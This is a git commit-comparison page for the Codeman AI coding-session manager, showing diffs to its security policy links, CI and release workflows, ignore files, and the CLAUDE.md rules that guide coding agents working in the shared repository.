Compare commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
cf3183abf7 | ||
|
|
15a43894f9 | ||
|
|
e20aa1d4d8 | ||
|
|
aa28ef048c | ||
|
|
67f6ed3168 | ||
|
|
2d4616f059 | ||
|
|
35f8f9d19f | ||
|
|
c992784681 | ||
|
|
3a7be356ae | ||
|
|
a6a572e635 | ||
|
|
26416f98de | ||
|
|
084d7b7328 | ||
|
|
a4cdb352be | ||
|
|
d81454b6f9 | ||
|
|
00f1b9228a | ||
|
|
13d069e1e5 | ||
|
|
fa4c36c2a5 | ||
|
|
fe2c03b2cc | ||
|
|
4e3f7ac36b | ||
|
|
089283e0b3 | ||
|
|
3b85001fed | ||
|
|
1513067a7f | ||
|
|
623fedf5b7 | ||
|
|
1410362e5b | ||
|
|
92ae46246c | ||
|
|
6831d79127 | ||
|
|
b01ed611c4 | ||
|
|
8d094b086c | ||
|
|
ecc6f30e24 | ||
|
|
7da9fb4d53 | ||
|
|
b025047cbf | ||
|
|
f11bee72f5 | ||
|
|
78356d7fd0 | ||
|
|
0da7f652b4 | ||
|
|
6ccab925b1 | ||
|
|
4b51ba306e | ||
|
|
aaad031510 | ||
|
|
29efd0e970 | ||
|
|
a6cf4c2b2a | ||
|
|
831af88579 | ||
|
|
3a106bd048 | ||
|
|
752374abc7 | ||
|
|
adfc4fbb1c | ||
|
|
b0b058891c | ||
|
|
4a1ad8d194 | ||
|
|
193ce6348d | ||
|
|
8668b4b352 | ||
|
|
312ca541e6 | ||
|
|
40ce91f098 | ||
|
|
250a53125a | ||
|
|
14ea9f630f | ||
|
|
c8ac04662d | ||
|
|
7c2a49d432 | ||
|
|
8fcfdb1e6e | ||
|
|
45ad9de89e | ||
|
|
a070fc43ea | ||
|
|
aa35c1a0c4 | ||
|
|
c13b3c55d3 | ||
|
|
053a6d238d | ||
|
|
9b9f2c21e9 | ||
|
|
a80eda8e4c | ||
|
|
5d42f64393 | ||
|
|
c891a8045d | ||
|
|
c942bb5dfb | ||
|
|
f98922063a | ||
|
|
5671c20076 | ||
|
|
d5375d7f0b | ||
|
|
1692238531 | ||
|
|
f9510f8a54 | ||
|
|
62ca7f1381 | ||
|
|
93df8188a5 | ||
|
|
94abcf29dc | ||
|
|
23d91a6ee1 | ||
|
|
8a6570e22d | ||
|
|
0aafabd28d | ||
|
|
4add38c4b1 | ||
|
|
e6df0c4094 | ||
|
|
6bb3d66004 | ||
|
|
161f1da2eb | ||
|
|
87e787e934 | ||
|
|
3533c4332b | ||
|
|
6fc772f697 | ||
|
|
527ce10491 | ||
|
|
26a4dd2879 | ||
|
|
e087198056 | ||
|
|
2e266380f8 | ||
|
|
3363d25876 | ||
|
|
b793ff3294 | ||
|
|
a68b2c5bc5 | ||
|
|
89f9e0becb | ||
|
|
6cc7b4328b | ||
|
|
ce22c2a608 | ||
|
|
338f0e460d | ||
|
|
8595e84c56 | ||
|
|
696339fe12 | ||
|
|
6c744f8677 | ||
|
|
c50bb02e62 | ||
|
|
086ea4dd7c | ||
|
|
b03780dfd2 | ||
|
|
ff10a50bc0 | ||
|
|
3e568511f8 | ||
|
|
64b33eb630 | ||
|
|
1e1db947c5 | ||
|
|
b1614e89fc | ||
|
|
0aa16cd4d3 | ||
|
|
4ed86aa0cd | ||
|
|
a15b81db77 | ||
|
|
341c7ccc59 | ||
|
|
c1719e04e5 | ||
|
|
d33f3803a1 | ||
|
|
477e73039c | ||
|
|
b374032699 | ||
|
|
b6efdfccf4 | ||
|
|
b191f3c2c6 | ||
|
|
9fd856a918 | ||
|
|
be449e6e9e | ||
|
|
04de943b7f | ||
|
|
9e7c537e14 | ||
|
|
55bff4a4bf | ||
|
|
fa02bd4503 | ||
|
|
5bde897752 | ||
|
|
6c55ce3f8d | ||
|
|
a30524060a | ||
|
|
00fb3b0908 | ||
|
|
5aa59c70cc | ||
|
|
ffccde4f7d | ||
|
|
bec3da3d31 | ||
|
|
6e89eb9ec1 | ||
|
|
94aa53c65b | ||
|
|
e88b971bb7 | ||
|
|
8406c497e2 | ||
|
|
40b4aba043 | ||
|
|
4b44988bfc | ||
|
|
316d0a4c82 | ||
|
|
1184720648 | ||
|
|
b067aad9b6 | ||
|
|
19a3d7c773 | ||
|
|
085f4acb60 | ||
|
|
d26f26fe34 | ||
|
|
091df2b6d8 | ||
|
|
5f775b1ab1 | ||
|
|
da51193264 | ||
|
|
fa18eeef35 | ||
|
|
a9f26bd03a | ||
|
|
8dc8b164a7 | ||
|
|
2524759655 | ||
|
|
1f164bc8d2 | ||
|
|
0a1439b1e9 | ||
|
|
66abe6c70a | ||
|
|
fa1700da5b | ||
|
|
aed1e59ee3 | ||
|
|
7f6d18b398 | ||
|
|
52571c7fd4 | ||
|
|
cb95a8562c | ||
|
|
3cb7e30636 | ||
|
|
9dc4620f03 | ||
|
|
9d27cc0bab | ||
|
|
84132d3025 | ||
|
|
cc163792e5 | ||
|
|
6f1ff17ccc | ||
|
|
f262b8cb69 | ||
|
|
5f2b491d99 | ||
|
|
c067167dbc | ||
|
|
ad2ca9b575 | ||
|
|
a7a1cef3d6 | ||
|
|
a1d7ec02e9 | ||
|
|
dfa43928af | ||
|
|
adbb74cd5a | ||
|
|
eb8d11ffc3 | ||
|
|
ebfcac6ad1 | ||
|
|
2e69e28e71 | ||
|
|
1a32e63765 | ||
|
|
d41f28bc14 | ||
|
|
322f21ef9f | ||
|
|
c2d973cb2d | ||
|
|
84e31c0ee1 | ||
|
|
0d0b772619 | ||
|
|
bfff20a093 | ||
|
|
b982c5d0e0 | ||
|
|
f50c922240 | ||
|
|
de5b048c3f | ||
|
|
12a5f5919e | ||
|
|
ecd3f3f32a | ||
|
|
c19d884a51 | ||
|
|
22e77a1827 | ||
|
|
b641560040 | ||
|
|
8300c15cbd | ||
|
|
09f5f28017 | ||
|
|
251706be3b | ||
|
|
18b473f0e4 | ||
|
|
a2aed38073 | ||
|
|
e888c65c52 | ||
|
|
1ea39de650 | ||
|
|
e2a644997e | ||
|
|
cd5a101626 | ||
|
|
4ea781c80f | ||
|
|
d9123de9eb | ||
|
|
1e5f6c8ee1 | ||
|
|
5d2899907e | ||
|
|
8facd5e7e7 | ||
|
|
b54094a4c8 | ||
|
|
2b89f35599 | ||
|
|
ee670c38f6 | ||
|
|
ad57109dcf | ||
|
|
c15b8345b5 | ||
|
|
45ae9f4064 | ||
|
|
816d900857 | ||
|
|
ddc267c6ff | ||
|
|
d66007053b | ||
|
|
f470f3a4e7 | ||
|
|
cb3eecad9b | ||
|
|
db24fc6d7e | ||
|
|
292ba2c775 | ||
|
|
e803186dfe | ||
|
|
474efd9023 | ||
|
|
03bb40c78a | ||
|
|
3ea1ea28f0 | ||
|
|
62008fb408 | ||
|
|
660b320a67 | ||
|
|
529d8fa8ea | ||
|
|
19af37977a | ||
|
|
23f258a85d | ||
|
|
aa4f423d8a | ||
|
|
1b1057d9e0 | ||
|
|
26cbbe0dcb | ||
|
|
1113d34ca8 | ||
|
|
ab7a703e90 | ||
|
|
8a31f10b7d | ||
|
|
2891ae0d6d | ||
|
|
17b86b1007 | ||
|
|
73315bc351 | ||
|
|
7e357691af | ||
|
|
80e7249a39 | ||
|
|
e0226f7186 | ||
|
|
e8681f575f | ||
|
|
64be4e3029 | ||
|
|
cb7d0ba565 | ||
|
|
22cb563f1e | ||
|
|
f0e13f9fc3 | ||
|
|
28c5b5c1eb | ||
|
|
af9db455ff | ||
|
|
a406aef2fa | ||
|
|
bba3d80971 | ||
|
|
94e3aae57d | ||
|
|
0a039239e4 | ||
|
|
67eb5b43eb | ||
|
|
4a4720cb62 | ||
|
|
3c903b36ca | ||
|
|
7c07284b95 | ||
|
|
77bcbc9b94 | ||
|
|
d4540c5ce6 | ||
|
|
4a83efcd48 | ||
|
|
473c57c7ca | ||
|
|
b586007f14 | ||
|
|
b388b84cc2 | ||
|
|
d13642ebce | ||
|
|
3cff98fe56 | ||
|
|
bc232e5ff3 | ||
|
|
2a7e035d2b | ||
|
|
80a88ea857 | ||
|
|
5c45d434ac | ||
|
|
390516ca3f | ||
|
|
57b6be1ed5 | ||
|
|
cbae989e02 | ||
|
|
84f47e8ee0 | ||
|
|
541d9c8131 | ||
|
|
e4ea785a28 | ||
|
|
b7a6a189f9 | ||
|
|
e063222ac2 | ||
|
|
346bc8b173 | ||
|
|
b34fcaf928 | ||
|
|
ea4c935d51 | ||
|
|
716b7ccdbb | ||
|
|
da7a095e33 | ||
|
|
149cee6bcd | ||
|
|
7cda2194c3 | ||
|
|
eb8724bbf2 | ||
|
|
cb6c25220f | ||
|
|
de87c4e315 | ||
|
|
63710cf2c1 | ||
|
|
8c089a4819 | ||
|
|
f812f65a33 | ||
|
|
2667150f33 | ||
|
|
a842b091bf | ||
|
|
dae82388ed | ||
|
|
bca56b4273 | ||
|
|
86c634959d | ||
|
|
fc5294e7c2 | ||
|
|
8e9f25482a | ||
|
|
211f3c07dd | ||
|
|
876f9a75b4 | ||
|
|
d7bb726213 | ||
|
|
715aef2076 | ||
|
|
608ec8a10e | ||
|
|
303afd7fe1 | ||
|
|
0ee268ba82 | ||
|
|
1be98ff8a3 | ||
|
|
b710013add | ||
|
|
4343805672 | ||
|
|
4f8471189e | ||
|
|
fad7cdc1ab | ||
|
|
56db02412b | ||
|
|
689d9fc5e5 | ||
|
|
50547a4e89 | ||
|
|
3c2a5bfef3 | ||
|
|
bc66add7ed | ||
|
|
24b5d8fa63 | ||
|
|
8d9fc4195b | ||
|
|
5abcae16b4 | ||
|
|
66ad681666 | ||
|
|
6c8d4ca72f | ||
|
|
2fdf7dabac | ||
|
|
51cb3a7205 | ||
|
|
b10e354936 | ||
|
|
64559b60d1 | ||
|
|
6351b4143f | ||
|
|
3d6e3f3d6e | ||
|
|
5c20fcf464 | ||
|
|
683544a22e | ||
|
|
5181c9abb0 | ||
|
|
25c67f9415 | ||
|
|
d6917e3b21 | ||
|
|
524a096e14 | ||
|
|
8d9dd70b51 | ||
|
|
ed47a599be | ||
|
|
ccb3afc9ee | ||
|
|
c3b0dc345b | ||
|
|
0ab2416460 | ||
|
|
ac6fe6ef79 | ||
|
|
dafe3de185 | ||
|
|
2a06f7a5a8 | ||
|
|
453605a58f | ||
|
|
4d8857f72a | ||
|
|
f496e35d71 | ||
|
|
91070f5dda | ||
|
|
fdce57ce5a | ||
|
|
a21400614a | ||
|
|
9046b95b7e | ||
|
|
8b3fa5f37c | ||
|
|
4c6f96a2ef | ||
|
|
d1928f300e | ||
|
|
ca731c67b3 | ||
|
|
a3fe0ae728 | ||
|
|
82825cbfb3 | ||
|
|
d1868516f7 | ||
|
|
3e1272a675 | ||
|
|
db6cd838b1 | ||
|
|
66a41f5aa9 | ||
|
|
a36c1f62db | ||
|
|
8b2c857c3f | ||
|
|
583678c950 | ||
|
|
5728b86a68 | ||
|
|
39ef17b6af | ||
|
|
814362b67b | ||
|
|
e9f9497259 | ||
|
|
8768ca4a5a | ||
|
|
df9214ba9a | ||
|
|
5f4c89b990 | ||
|
|
54615e2371 | ||
|
|
828b1664f7 | ||
|
|
5ec71ace5a | ||
|
|
b27a0e9188 | ||
|
|
35a0217ccd | ||
|
|
7a86cf87f7 | ||
|
|
5792c2d62e | ||
|
|
8807b3ff6d | ||
|
|
115ada1e9e | ||
|
|
b2ebdcbf47 | ||
|
|
6dba8b5227 | ||
|
|
897bfdff59 | ||
|
|
fb013e9de0 | ||
|
|
7f24a132d0 | ||
|
|
6f4b2b8a17 | ||
|
|
a531f48e17 | ||
|
|
7d5ea0bd50 | ||
|
|
a9ae141eec | ||
|
|
7b79d4207c | ||
|
|
28744a2761 | ||
|
|
cca07e2b11 | ||
|
|
9806efdf0a | ||
|
|
b00e7cf17c | ||
|
|
efe2d8966a | ||
|
|
f55f035690 | ||
|
|
58fc5f874a | ||
|
|
1301b4b58c | ||
|
|
46493f374e | ||
|
|
b20c00702a | ||
|
|
d55ebcb644 | ||
|
|
e84a3834d0 | ||
|
|
f89bc420ba | ||
|
|
5a4e60dc8e | ||
|
|
460972a50e | ||
|
|
8a971c3935 | ||
|
|
83779cab4d | ||
|
|
a8e7669f5a | ||
|
|
5deb0d4a4c | ||
|
|
84ab4ff07b | ||
|
|
88f47754ad | ||
|
|
6e417d69dc | ||
|
|
f98d29b323 | ||
|
|
360d58ca4f | ||
|
|
6cac517fa6 | ||
|
|
2235f06ea5 | ||
|
|
65b609b6db | ||
|
|
c9f37f2628 | ||
|
|
309959be27 | ||
|
|
13c877f938 | ||
|
|
895edfedb0 | ||
|
|
3f23621f8d | ||
|
|
5cca965aa4 | ||
|
|
b74a904b41 | ||
|
|
05d366e405 | ||
|
|
9204e42812 | ||
|
|
a9749ead6a | ||
|
|
e510ab74ca | ||
|
|
7fa52cdcd6 | ||
|
|
5ea424565d | ||
|
|
0ad673794f | ||
|
|
4d3080aacc | ||
|
|
246f7b532d | ||
|
|
116db81002 | ||
|
|
bb1d16e230 | ||
|
|
978ca57343 | ||
|
|
f8aa93969b | ||
|
|
584910f645 | ||
|
|
b86b132af5 | ||
|
|
4ab89f9a4e | ||
|
|
20cb42d202 | ||
|
|
68fd6e8962 | ||
|
|
be4fecdad5 | ||
|
|
c7967d4b55 | ||
|
|
8be83cd585 | ||
|
|
09fd1e495f | ||
|
|
7efc6cd5a8 | ||
|
|
286cf0768d | ||
|
|
3c0e6286f6 | ||
|
|
8a133d083b | ||
|
|
a0e26db1dc | ||
|
|
596899e19b | ||
|
|
e8f5ac94f3 | ||
|
|
03192d9980 | ||
|
|
3d4444ad78 | ||
|
|
c45e456b0e | ||
|
|
ad25e234f4 | ||
|
|
48fd2da6ce | ||
|
|
e29721046c | ||
|
|
3a03792009 | ||
|
|
e83ff72b61 | ||
|
|
268a0bbdbd | ||
|
|
26e78daf58 | ||
|
|
568d93efb0 | ||
|
|
3bf991d730 | ||
|
|
7fb58648ba | ||
|
|
9535edc367 | ||
|
|
443b85c18e | ||
|
|
66eaaf0da3 | ||
|
|
ce4c5dd584 | ||
|
|
e77af21107 | ||
|
|
a842f2db4d | ||
|
|
bf36eb0db4 | ||
|
|
4dfdbcd100 | ||
|
|
ad71a92f29 | ||
|
|
1fa88cd187 | ||
|
|
613eb25302 | ||
|
|
8c0c94540c | ||
|
|
d9c2c6420d | ||
|
|
6082bceee6 | ||
|
|
40e26c5422 | ||
|
|
9feaa0d6e5 | ||
|
|
2d2f4e592b | ||
|
|
6ae86b53f6 | ||
|
|
abb6447f66 | ||
|
|
cc7c0e5dcb | ||
|
|
368fc20fc2 | ||
|
|
9cc310e843 | ||
|
|
aa991ece8f | ||
|
|
3b4106c349 | ||
|
|
c2867be77f | ||
|
|
a1b66f3510 | ||
|
|
98ba1fd49c | ||
|
|
9df310c30a | ||
|
|
50b8f1d9a0 | ||
|
|
11bacf67a0 | ||
|
|
509595b837 | ||
|
|
c95e94e4cb | ||
|
|
19139837e4 | ||
|
|
9afaccc85d | ||
|
|
95df96e06a | ||
|
|
1255e28f6f | ||
|
|
9d12fc7f94 | ||
|
|
5d406c9705 | ||
|
|
a8782b364f | ||
|
|
d8da1bd3ff | ||
|
|
06871eb7e3 | ||
|
|
5d59c1764d | ||
|
|
cfcd9d288b | ||
|
|
9c22114b5a | ||
|
|
98b2124d7e | ||
|
|
bdaec320f5 | ||
|
|
dfe20a3742 | ||
|
|
de5216b83f | ||
|
|
57eefd7aa5 | ||
|
|
2c81bbc08b | ||
|
|
b374121c18 | ||
|
|
b1c4330680 | ||
|
|
47359e4002 | ||
|
|
a8e7d60db4 | ||
|
|
8dc70a5f1d | ||
|
|
4d129086d1 | ||
|
|
566c65c3c9 | ||
|
|
cd7d8c7329 | ||
|
|
c55af9ec39 | ||
|
|
1a54217bfb | ||
|
|
70742d400a | ||
|
|
d5809d1808 | ||
|
|
a0ac10a07c | ||
|
|
f7814ad364 | ||
|
|
3172befd5d | ||
|
|
29ffc62536 | ||
|
|
4cb3a4aac8 | ||
|
|
b6531cbf79 | ||
|
|
d16bf34e34 |
@@ -4,7 +4,7 @@ Codeman launches AI coding sessions with `--dangerously-skip-permissions`, so th
|
||||
web UI is **by design a remote-code-execution surface for whoever can reach it**.
|
||||
The entire security model exists to control *who* that is. Please read this before
|
||||
exposing an instance beyond `localhost`. The full model lives in
|
||||
[`docs/security-architecture.md`](docs/security-architecture.md).
|
||||
[`docs/security-architecture.md`](../docs/security-architecture.md).
|
||||
|
||||
## Supported versions
|
||||
|
||||
@@ -75,4 +75,4 @@ subscribe and send time), and tmux session names discovered on the shared socket
|
||||
are validated against the safe-name pattern before reaching any shell call site.
|
||||
|
||||
For the detailed rationale, defenses, and recommended secure setups, see
|
||||
[`docs/security-architecture.md`](docs/security-architecture.md).
|
||||
[`docs/security-architecture.md`](../docs/security-architecture.md).
|
||||
@@ -91,6 +91,14 @@ jobs:
|
||||
# Safe in CI: TmuxManager no-ops all shell commands under VITEST (test/setup.ts).
|
||||
run: npm run test:ci
|
||||
|
||||
- name: Run xterm-zerolag-input package tests
|
||||
# Layers 1-3 of the predictive-echo suites (unit laws, fixture replay,
|
||||
# seeded fuzz): deterministic, no browser, no live server. Depends on
|
||||
# the ROOT `npm ci` above — workspaces hoist the package's vitest into
|
||||
# the root node_modules; do not add a separate install here.
|
||||
run: npx vitest run
|
||||
working-directory: packages/xterm-zerolag-input
|
||||
|
||||
# Note: The browser-driven mobile suite (test/mobile/**) is excluded from CI —
|
||||
# it needs a live server + chromium + environment-specific PNG baselines.
|
||||
# Run it locally/manually. All other tests run via the `test` job above.
|
||||
|
||||
@@ -52,12 +52,20 @@ jobs:
|
||||
OLD_TAG="aicodeman@${VERSION}"
|
||||
NEW_TAG="codeman@${VERSION}"
|
||||
|
||||
# Update the GitHub release BEFORE deleting the old tag
|
||||
# Update the GitHub release BEFORE deleting the old tag.
|
||||
# make_latest pins the "Latest" badge to the Codeman release. This repo
|
||||
# publishes TWO packages (aicodeman + xterm-zerolag-input), changesets
|
||||
# creates a GitHub release for each, and GitHub awards "Latest" to
|
||||
# whichever was published LAST. That is a race: 1.9.2 kept the badge,
|
||||
# 1.9.4 lost it to xterm-zerolag-input@0.1.7 by two seconds. All package
|
||||
# releases already exist by the time this step runs, so setting it here
|
||||
# is deterministic.
|
||||
RELEASE_ID=$(gh release view "$OLD_TAG" --json databaseId -q .databaseId 2>/dev/null || true)
|
||||
if [ -n "$RELEASE_ID" ]; then
|
||||
gh api -X PATCH "repos/${{ github.repository }}/releases/${RELEASE_ID}" \
|
||||
-f tag_name="$NEW_TAG" \
|
||||
-f name="$NEW_TAG"
|
||||
-f name="$NEW_TAG" \
|
||||
-f make_latest=true
|
||||
fi
|
||||
|
||||
# Retag
|
||||
|
||||
@@ -2,6 +2,9 @@
|
||||
.agents/
|
||||
skills-lock.json
|
||||
|
||||
# Written by install.sh into end-user clones when setup finishes
|
||||
.install-complete
|
||||
|
||||
# Dependencies
|
||||
node_modules/
|
||||
|
||||
@@ -52,11 +55,22 @@ Thumbs.db
|
||||
# Generated output
|
||||
out/
|
||||
screenshots-echo-diag/
|
||||
screenshots-readme/
|
||||
screenshots-readme-real/
|
||||
screenshots-real/
|
||||
scripts/remotion/out/
|
||||
|
||||
# Local UI/README capture scratch (screenshot runs, design mockups). Not build
|
||||
# output, but never meant for git — an unqualified `git add -A` during a COM has
|
||||
# swept dirs like these into a release before.
|
||||
design-explorations/
|
||||
|
||||
# Artifacts that should not be tracked
|
||||
test-results/
|
||||
tmp/
|
||||
# Machine-local working files (never meant for git). ANCHORED so only the root
|
||||
# dir matches.
|
||||
/pr/
|
||||
# Root `public` (a symlink to scripts/remotion/public — local artifact). ANCHORED
|
||||
# with a leading slash so it does NOT also match src/web/public (a bare `public`
|
||||
# would swallow the whole web UI source dir and silently un-stage any new asset
|
||||
|
||||
@@ -26,3 +26,6 @@ src/web/public/terminal-ui.js
|
||||
src/web/public/voice-input.js
|
||||
src/web/public/upload.html
|
||||
scripts/remotion/
|
||||
|
||||
# Hand-maintained; Prettier escapes underscores in glob paths and corrupts paragraphs.
|
||||
CLAUDE.md
|
||||
|
||||
@@ -1,8 +0,0 @@
|
||||
{
|
||||
"singleQuote": true,
|
||||
"semi": true,
|
||||
"tabWidth": 2,
|
||||
"printWidth": 120,
|
||||
"trailingComma": "es5",
|
||||
"endOfLine": "lf"
|
||||
}
|
||||
@@ -2,17 +2,23 @@
|
||||
|
||||
This file provides guidance to Claude Code (claude.ai/code) when working with code in this repository.
|
||||
|
||||
> Deep implementation detail lives in [`docs/architecture-invariants.md`](docs/architecture-invariants.md). This file holds the rules that prevent mistakes; that file holds the mechanisms, file inventories, and the history behind each rule. Pointers below are written as `→ architecture-invariants#anchor`. When the goal is raw throughput, [`docs/SPEEDRUN.md`](docs/SPEEDRUN.md) is the fast-execution protocol (it removes ceremony, never the safety rules here).
|
||||
>
|
||||
> **This file is in `.prettierignore` on purpose.** Prettier's markdown printer escapes underscores inside the glob-heavy paths used throughout (`agent-*.jsonl` became `agent-\_.jsonl`, collapsing backtick spans and corrupting a whole paragraph). Do not remove the ignore entry, and do not run `prettier --write` on it.
|
||||
>
|
||||
> **Repo root is kept short on purpose** (the README sits below the file listing on GitHub). Config lives in `config/` (`eslint.config.js`, `knip.json`, the vitest configs), Prettier's config is the `"prettier"` key in `package.json`, and `SECURITY.md` is under `.github/`. Root-only files are the ones tools genuinely require there: `CLAUDE.md` + `AGENTS.md` (loaded from the root by Claude Code / Codex), `CHANGELOG.md` (changesets writes it next to `package.json`), `tsconfig.json`, `.editorconfig`, `.nvmrc`/`.npmrc`, `.prettierignore` (resolved relative to cwd), `LICENSE` (GitHub detection) and `install.sh` (its raw URL is the published install one-liner). Don't relocate those.
|
||||
|
||||
## Quick Reference
|
||||
|
||||
| Task | Command |
|
||||
|------|---------|
|
||||
| Dev server | `npm run dev` (or `npx tsx src/index.ts web`) |
|
||||
| Type check | `tsc --noEmit` |
|
||||
| Lint | `npm run lint` (fix: `npm run lint:fix`) |
|
||||
| Format | `npm run format` (check: `npm run format:check`) |
|
||||
| Task | Command |
|
||||
| ----------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| Dev server | `npm run dev` (or `npx tsx src/index.ts web`) |
|
||||
| Type check | `npm run typecheck` (= `tsc --noEmit`) |
|
||||
| Lint | `npm run lint` (fix: `npm run lint:fix`) |
|
||||
| Format | `npm run format` (check: `npm run format:check`) |
|
||||
| Single test | `npm test -- test/<file>.test.ts` (or `npx vitest run --config config/vitest.config.ts test/<file>.test.ts`) — ⚠ **never** run bare `npm test`, see Testing section |
|
||||
| Build | `npm run build` (esbuild via `scripts/build.mjs`, NOT tsc — `tsc --noEmit` is type-check only) |
|
||||
| Production | `npm run build && systemctl --user restart codeman-web` |
|
||||
| Build | `npm run build` (esbuild via `scripts/build.mjs`, NOT tsc — `tsc --noEmit` is type-check only) |
|
||||
| Production | `npm run build && systemctl --user restart codeman-web` |
|
||||
|
||||
## CRITICAL: Session Safety
|
||||
|
||||
@@ -22,6 +28,13 @@ This file provides guidance to Claude Code (claude.ai/code) when working with co
|
||||
2. **NEVER** run `tmux kill-session`, `pkill tmux`, or `pkill claude` without confirming
|
||||
3. Use the web UI or `./scripts/tmux-manager.sh` instead of direct kill commands
|
||||
|
||||
**The working tree is shared with other agent sessions.** Several Codeman sessions run against THIS one checkout, so another session can `git checkout` a different branch, or leave half-finished untracked files, while you are mid-task.
|
||||
|
||||
- **Always `git branch --show-current` immediately before committing.** Observed 2026-07-27: another session ran `git checkout -b feat/web-tabs`, a commit silently landed there instead of master, and the follow-up `git push origin master` cheerfully reported "Everything up-to-date".
|
||||
- To land a commit on master **without** switching branches (which would yank the tree out from under the other session): `git push origin HEAD:master` then `git branch -f master HEAD`. Never `git checkout master` to "fix" it.
|
||||
- **Never `git add -A`/`git add .`** — stage explicit paths. A sweep will pick up another session's WIP.
|
||||
- Another session's broken WIP can block `npm run build`, since `tsc` is the first step and the build gates on it. That is not your bug to fix. ⚠️ `tsc` still EMITS on type errors, so a failed `npm run build` leaves a rebuilt `dist/index.js` compiled from their tree; check what it pulled in before restarting the service. To deploy frontend-only changes past a blocked `tsc`, run the asset stage of `scripts/build.mjs` (everything after the `tsc`/`chmod` lines is independent of it).
|
||||
|
||||
## CRITICAL: Always Test Before Deploying
|
||||
|
||||
**NEVER COM without verifying your changes actually work.** For every fix:
|
||||
@@ -30,15 +43,17 @@ This file provides guidance to Claude Code (claude.ai/code) when working with co
|
||||
2. **Frontend changes**: Use Playwright to load the page and assert the UI renders correctly. Use `waitUntil: 'domcontentloaded'` (not `networkidle` — SSE keeps the connection open). Wait 3-4s for polling/async data to populate, then check element visibility, text content, and CSS values
|
||||
3. **Only after verification passes**, proceed with COM
|
||||
|
||||
The production server caches static files for 1 year, `immutable` (`maxAge: '1y'` in `server.ts`). To avoid stale frontend after a deploy, `renderIndexHtml` runs `cacheBustAssets(html)` — it appends `?v=<mtime>` to **every same-origin `.js`/`.css`** reference (mtime memoized ~1s so a burst of renders is cheap; external/already-versioned/missing refs untouched). Because `index.html` is served `no-cache`, a **normal reload now picks up edited modules/styles — no hard refresh needed** (the gesture bundle is injected separately with its own `?v=`). If you add an asset referenced by an *absolute* URL or from JS rather than a `<script>/<link>` tag, it won't be auto-busted.
|
||||
The production server caches static files for 1 year, `immutable` (`maxAge: '1y'` in `server.ts`). To avoid stale frontend after a deploy, `renderIndexHtml` runs `cacheBustAssets(html)` — it appends `?v=<mtime>` to **every same-origin `.js`/`.css`** reference (mtime memoized ~1s so a burst of renders is cheap; external/already-versioned/missing refs untouched). Because `index.html` is served `no-cache`, a **normal reload now picks up edited modules/styles — no hard refresh needed** (the gesture bundle is injected separately with its own `?v=`). If you add an asset referenced by an _absolute_ URL or from JS rather than a `<script>/<link>` tag, it won't be auto-busted. ⚠️ **`index.html` itself is the exception: it is read ONCE into `indexHtmlTemplate` in the `WebServer` constructor**, so editing markup in dev needs a server restart (edited `.js`/`.css` do not) — otherwise you debug a "CSS class that doesn't apply" that is really an element still missing from the served HTML.
|
||||
|
||||
## COM Shorthand (Deployment)
|
||||
|
||||
Uses [Semantic Versioning](https://semver.org/) (`MAJOR.MINOR.PATCH`) via `@changesets/cli`. What SemVer actually covers (the CLI + documented env vars are public; the HTTP/SSE API, on-disk state, and experimental features are internal/unstable) is defined in `docs/versioning-policy.md`. Security reporting + known limitations live in `SECURITY.md`.
|
||||
Uses [Semantic Versioning](https://semver.org/) (`MAJOR.MINOR.PATCH`) via `@changesets/cli`. What SemVer actually covers (the CLI, documented env vars, **and the HTTP/SSE API under `/api/v1`**: endpoint paths, response envelope, `errorCode` values and SSE event names are public/stable; on-disk state, internal TS modules, and experimental features are internal/unstable) is defined in `docs/versioning-policy.md`. Third-party integration surfaces are documented in `docs/extending-codeman.md`. Security reporting + known limitations live in `.github/SECURITY.md`.
|
||||
|
||||
When user says "COM":
|
||||
|
||||
1. **Determine bump type**: `COM` = patch (default), `COM minor` = minor, `COM major` = major
|
||||
2. **Create a changeset file** (no interactive prompts). Write a `.md` file in `.changeset/` with a random filename:
|
||||
|
||||
```bash
|
||||
cat > .changeset/$(openssl rand -hex 4).md << 'CHANGESET'
|
||||
---
|
||||
@@ -48,21 +63,24 @@ When user says "COM":
|
||||
Detailed description of ALL changes since last release (not just the most recent commit — review full git log since last version tag)
|
||||
CHANGESET
|
||||
```
|
||||
|
||||
Replace `patch` with `minor` or `major` as needed. Include `"xterm-zerolag-input": patch` on a separate line if that package changed too.
|
||||
|
||||
3. **Consume the changeset**: `npm run version-packages` (auto-bumps `package.json` files, updates `CHANGELOG.md`, runs `npm install --package-lock-only`, and verifies lockfile sync via `scripts/check-lockfile-sync.mjs` — all in one command; never hand-edit `CHANGELOG.md` or `package-lock.json` versions)
|
||||
4. **Sync CLAUDE.md version**: Update the `**Version**` line below to match the new version from `package.json`
|
||||
5. **Commit and deploy**: `git add -A && git commit -m "chore: version packages" && git push && npm run build && systemctl --user restart codeman-web`
|
||||
6. **Wait for CI**: after `git push`, find the run with `gh run list -L 1 --json databaseId,headBranch -q '.[0].databaseId'` and watch it with `gh run watch <id> --exit-status`. Confirm all checks pass before considering the release done.
|
||||
5. **Commit and deploy**: verify the branch first (`git branch --show-current`), then stage EXPLICIT paths — never `git add -A`, which has swept another session's WIP into a release. `git status --short` and account for every line before committing:
|
||||
`git add <paths> && git commit -m "chore: version packages" && git push && npm run build && systemctl --user restart codeman-web`
|
||||
6. **Wait for CI**: after `git push`, TWO workflows fire per master push — `CI` and `Release` (the npm publish + GitHub release). List both runs for the pushed commit with `gh run list --commit $(git rev-parse HEAD) --json databaseId,workflowName` and watch EACH with `gh run watch <id> --exit-status`. Confirm both pass before considering the release done (`gh run list -L 1` returns only one of the two).
|
||||
|
||||
CI runs `npm run check:lockfile` on every push/PR, so lockfile drift fails the build even if the `version-packages` script is bypassed.
|
||||
|
||||
**Version**: 1.1.2 (must match `package.json`)
|
||||
**Version**: 1.16.6 (must match `package.json`)
|
||||
|
||||
## Project Overview
|
||||
|
||||
Codeman is a Claude Code session manager with web interface and autonomous Ralph Loop. Spawns Claude CLI via PTY, streams via SSE, supports respawn cycling for 24+ hour autonomous runs.
|
||||
|
||||
**Tech Stack**: TypeScript (ES2022/NodeNext, strict mode), Node.js, Fastify, node-pty, xterm.js. Supports Claude Code, OpenCode, and Codex (OpenAI) CLIs via pluggable CLI resolvers (`SessionMode = 'claude' | 'shell' | 'opencode' | 'codex'`).
|
||||
